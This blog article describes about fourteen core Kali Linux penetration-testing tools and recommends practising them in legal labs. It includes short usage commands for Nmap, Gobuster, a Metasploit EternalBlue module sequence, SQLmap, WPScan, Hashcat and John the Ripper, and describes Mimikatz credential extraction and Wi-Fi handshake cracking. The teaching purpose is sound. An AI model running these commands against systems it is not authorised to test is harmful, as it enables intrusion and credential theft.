Kali Linux Tools Every Ethical Hacker Uses

Kuldeep Kumawat

Kuldeep Kumawat

Mar 13, 2026Cyber Security
Kali Linux Tools Every Ethical Hacker Uses

Categories

Social EngineeringCryptographyAI ThreatsExploitationHealthcare Cyber SecurityDigital BankingServer ProtectionEmail SecurityCISSPOffensive Security

Table of Contents

Introduction

Kali Linux ships with over 600 pre-installed security tools.
A new student spends weeks installing and briefly experimenting with all of them.
At their first penetration test interview, they cannot confidently demonstrate proficiency with any single one.

But here's the problem:

👉 Professional ethical hackers do not use all the Kali Linux tools available. They use a carefully selected core toolkit—and they know that small toolkit extraordinarily well.

Kali Linux's overwhelming toolkit is both its greatest strength and its most dangerous trap for beginners. The sheer volume of tools creates the illusion that learning more tools equals becoming a better hacker. In reality, it is the exact opposite. The penetration tester who can use Nmap like second nature, who can craft Burp Suite payloads intuitively, and who can navigate Metasploit quickly and confidently is infinitely more effective than someone who has briefly touched 200 different tools.

Instead of trying to learn everything, the most successful ethical hackers identify the universally relied-upon core tools, invest serious time building genuine proficiency with each one, and then add specialized tools as specific engagement scenarios demand.

In this definitive breakdown, you'll learn:

  • Why mastery of fewer Kali Linux tools beats surface exposure to many
  • The top tools organized by their role in the penetration test lifecycle
  • Exactly what each tool does and what problem it is designed to solve
  • Recommended beginner exercises to build genuine practical proficiency
  • Which tools appear on OSCP and other professional certification exams
  • How to safely practice these tools in a legal laboratory environment

By the end of this article, you will have clarity on exactly which Kali Linux tools deserve your dedicated study time, and a plan for practicing each methodically.

The Core Principle: Depth Over Breadth

Before listing the tools, it is essential to reinforce the foundational principle that separates professional penetration testers from enthusiastic amateurs.

In a real client engagement, you are under time pressure. The client is paying significant hourly fees. You cannot afford to Google basic usage syntax for your own tools. You cannot run a tool blindly and hope the output makes sense. You need to know exactly what data you are expecting from each tool, and precisely how to interpret anomalies in that output to identify vulnerabilities.

This level of intuitive proficiency only comes from deeply repetitive, deliberate practice with a small number of core Kali Linux tools. Quality of practice always defeats quantity of tools collected.

Reconnaissance & Information Gathering Tools

1. Maltego

Primary purpose: Visual OSINT (Open Source Intelligence) mapping.

Maltego automates the collection of information from public data sources (DNS records, WHOIS databases, social media platforms, and web scraping) and displays the relationships between entities as a visual graph. A domain name connects to IP addresses, which connect to server administrators, whose emails connect to other associated domain registrations.

Why it's essential: During the reconnaissance phase, mapping these data relationships often reveals unexpected attack vectors—a forgotten subdomain, an exposed employee email on a public GitHub repository, or a test server that shouldn't be publicly accessible.

2. theHarvester

Primary purpose: Automated email, subdomain, and IP address gathering.

A command-line OSINT tool that queries search engines, LinkedIn, Shodan, and other public data sources to aggregate employee email addresses, subdomains, and IP ranges associated with the target organization.

Practice exercise: Run theHarvester against a company that has an explicit bug bounty program (like HackerOne's public scope). Map the emails and subdomains it discovers.

Scanning & Enumeration Tools

3. Nmap

Primary purpose: Network host discovery and port scanning.

Nmap is the universal starting point of every single penetration test. It identifies which hosts are listening on a network, which ports are open on each host, and which software services are running behind those ports. The -sV flag enables service version detection, which is critical for finding exploitable software versions.

Key Kali usage:

nmap -sV -sC -p- --open 192.168.1.10

This single command runs a comprehensive scan: detect service versions (-sV), run default safe scripts (-sC), scan all 65535 ports (-p-), and display only open ports (--open).

Why it appears everywhere: The OSCP exam, CEH exam, and virtually every professional penetration testing methodology lists Nmap as the required first active scanning tool. Mastering Nmap is non-negotiable.

4. Gobuster / Dirb / Feroxbuster

Primary purpose: Directory and file brute-forcing on web servers.

These tools rapidly brute-force a web server's URL paths using large wordlists to discover hidden directories and files not linked from the main website (e.g., /admin, /backup, /old-site, /config). Hidden directories often contain exposed configuration files, old upload forms, or unprotected administrative panels.

Common Kali command:

gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Exploitation Tools

5. Metasploit Framework (msfconsole)

Primary purpose: Comprehensive exploitation platform.

Metasploit is Kali's most powerful exploitation tool. It contains hundreds of pre-built exploit modules targeting known vulnerabilities in specific software versions. The post-exploitation agent (Meterpreter) provides a rich, interactive session on compromised machines, enabling file browsing, credential harvesting, and lateral movement.

Essential commands:

msfconsole                          # Launch Metasploit
search eternalblue                  # Search for a specific exploit
use exploit/windows/smb/ms17_010_eternalblue  # Select an exploit module
show options                        # View required parameters
set RHOSTS 192.168.1.10            # Configure the target
run                                 # Execute the exploit

OSCP relevance: The OSCP exam explicitly limits Metasploit usage to a single target machine. However, understanding Metasploit deeply—including without automation—is a fundamental learning milestone before transitioning to fully manual exploitation.

6. SQLmap

Primary purpose: Automated SQL injection detection and exploitation.

SQLmap takes a URL with a parameter and automatically determines whether it is vulnerable to SQL injection. If vulnerable, it can automatically extract database tables, column names, and data. It supports union-based, time-based blind, boolean-based, and error-based SQL injection techniques.

Basic usage:

sqlmap -u "http://target.com/page.php?id=1" --dbs

Web Application Testing Tools

7. Burp Suite

Primary purpose: Web application intercepting proxy and analysis platform.

Burp Suite sits between your browser and the web server, capturing every single HTTP request. You can pause, inspect, modify, and resend requests manually. Its Intruder module automates fuzzing by substituting payload lists into specified positions within a request, enabling efficient testing of login forms, search fields, and API parameters.

Key Burp Suite modules for beginners:

  • Proxy: The core intercepting proxy.
  • Repeater: Manually modify and re-send HTTP requests.
  • Intruder: Automate payload injection across parameters.
  • Decoder: Encode/decode common formats (Base64, URL encoding, HTML entities).

8. WPScan

Primary purpose: WordPress vulnerability scanner.

WordPress powers a massive percentage of the internet. WPScan is a purpose-built black-box scanner that identifies vulnerable WordPress versions, insecure plugins, exposed user accounts, and weak passwords against a WordPress installation.

wpscan --url http://target-wordpress.com --enumerate u,p

Password Cracking Tools

9. Hashcat

Primary purpose: GPU-accelerated offline password hash cracking.

Hashcat leverages your graphics card (GPU) to perform tens of billions of hash calculations per second, cracking captured password hashes using dictionary attacks (trying every word in a massive wordlist) or brute-force attacks (trying every possible character combination).

Typical usage against an NTLM hash:

hashcat -m 1000 captured_hash.txt /usr/share/wordlists/rockyou.txt

The rockyou.txt wordlist—containing over 14 million real-world passwords leaked from a massive historical breach—comes bundled with Kali Linux.

10. John the Ripper

Primary purpose: Offline password cracker with automatic hash detection.

John the Ripper automatically identifies common hash types from a file's formatting and begins cracking them with its extensive default rule set without requiring the user to specify the hash type manually.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Post-Exploitation & Privilege Escalation Tools

11. LinPEAS / WinPEAS

Primary purpose: Automated local privilege escalation enumeration.

After gaining an initial low-privilege shell on a target machine, the next objective is escalating to root (Linux) or SYSTEM (Windows) level privileges. LinPEAS (Linux Privilege Escalation Awesome Script) and WinPEAS (Windows equivalent) automatically enumerate hundreds of potential privilege escalation vectors extremely quickly and color-codes the most critical findings.

Running LinPEAS immediately after getting an initial shell on a Linux machine is a near-universal penetration testing practice.

12. Mimikatz (Windows)

Primary purpose: Windows credential extraction.

Mimikatz is the most infamous post-exploitation tool in existence. Running with SYSTEM-level privileges on a Windows machine, Mimikatz can extract plaintext passwords, NTLM password hashes, and Kerberos tickets directly from Windows memory. These captured credentials are then used for Pass-the-Hash attacks or lateral movement across the Active Directory domain.

Network Analysis Tools

13. Wireshark

Primary purpose: Network packet capture and analysis.

Wireshark captures and analyzes all packets traversing a network interface, decoding them into their constituent protocols and displaying them in a structured, filterable format. It is invaluable for understanding what data is unencrypted on a network, analyzing malware behaviour traffic, and understanding how specific protocols operate at the packet level.

14. Aircrack-ng Suite

Primary purpose: Wireless network security auditing.

The Aircrack-ng suite provides tools for capturing Wi-Fi handshakes (airodump-ng), forcing deauthentication of clients (aireplay-ng), and cracking captured WPA2 handshakes against password wordlists (aircrack-ng). Wireless security testing is a dedicated penetration testing specialization and Aircrack-ng is its foundational toolkit.

Short Summary

Mastering Kali Linux tools is not about installing and touching everything—it is about building genuine operational proficiency with the tools that matter most. The non-negotiable core toolkit includes: Nmap and Gobuster for reconnaissance and web enumeration; Metasploit and SQLmap for exploitation; Burp Suite for web application testing; Hashcat and John the Ripper for password cracking; LinPEAS and Mimikatz for post-exploitation privilege escalation; and Wireshark for network traffic analysis. Every one of these tools comes pre-installed on Kali Linux and can be legally and safely practiced on platforms like TryHackMe on dedicated training machines.

Conclusion

The breadth of Kali Linux's toolkit is a testament to the vast scope of the penetration testing field. There is a specialized tool for almost every conceivable security testing scenario.

However, professional mastery comes from depth, not from breadth. Pick five tools from this list. Install them, read their official documentation, and spend a dedicated week practicing each one exclusively against legal target machines on TryHackMe or your personal home lab. Write up your findings. Understand not just what the tool output shows, but why it showed that result.

When you can use your core Kali Linux tools without thinking—when the commands flow naturally from your fingers and the output speaks to you intuitively—you will have achieved the functional proficiency that separates amateurs from professionals.

Explore Tags

Kali Linux ToolsPenetration Testing ToolsEthical HackingSecurity SoftwareInfoSec

Related Articles

View All
Aircrack NG WiFi Hacking Guide: Breaking WPA2 Security
Cyber Security

Aircrack NG WiFi Hacking Guide: Breaking WPA2 Security

Explore the mechanics of wireless exploitation with this Aircrack NG WiFi hacking guide. Learn how ethical hackers intercept handshakes and crack WPA2 networks.

Artifact Geeks
Artifact Geeks
Read More
Cyber Security Trends in 2026: Preparing for the Future of Digital Threats
Cyber Security

Cyber Security Trends in 2026: Preparing for the Future of Digital Threats

Discover the most critical security developments. This cyber security trends guide covers AI-driven attacks, quantum-resistant cryptography, and the rise of autonomous defense.

Harshit Chhipa
Harshit Chhipa
Read More
Password Cracking Techniques Explained
Cyber Security

Password Cracking Techniques Explained

Learn how password cracking techniques work, from dictionary attacks to brute force and rainbow tables. Understand the methods hackers use—and how to defend against them.

Artifact Geeks
Artifact Geeks
Read More